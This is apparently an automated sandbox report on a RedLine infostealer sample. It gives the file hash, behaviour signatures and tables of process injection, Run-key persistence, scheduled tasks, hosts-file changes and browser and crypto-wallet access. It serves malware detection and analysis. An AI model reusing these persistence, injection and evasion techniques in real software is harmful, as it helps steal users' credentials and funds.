Malware Analysis Report

2025-01-18 09:17

Sample ID 230808-ppkf5ace33
Target 5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d
SHA256 5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d
Tags
redline logsdiller cloud (tg: @logsdillabot) evasion infostealer persistence spyware stealer themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d

Threat Level: Known bad

The file 5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d was found to be: Known bad.

Malicious Activity Summary

redline logsdiller cloud (tg: @logsdillabot) evasion infostealer persistence spyware stealer themida

Suspicious use of NtCreateUserProcessOtherParentProcess

RedLine

Drops file in Drivers directory

Stops running service(s)

Downloads MZ/PE file

Executes dropped EXE

Themida packer

Reads user/profile data of web browsers

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in Program Files directory

Drops file in Windows directory

Launches sc.exe

Unsigned PE

Program crash

Enumerates physical storage devices

Modifies data under HKEY_USERS

Suspicious behavior: LoadsDriver

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-08 12:30

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-08 12:30

Reported

2023-08-08 12:32

Platform

win10-20230703-en

Max time kernel

150s

Max time network

154s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Stops running service(s)

evasion

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2767205360-3565838719-3800013281-1000\Software\Microsoft\Windows\CurrentVersion\Run\AppLaunch = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe\"" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1736 set thread context of 5080 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1664 set thread context of 4464 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 1664 set thread context of 4300 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1664 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 1664 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 1664 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 1664 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 1664 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 1664 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 5100 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 5100 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 1664 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 1664 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 1664 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 1736 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1736 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1736 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
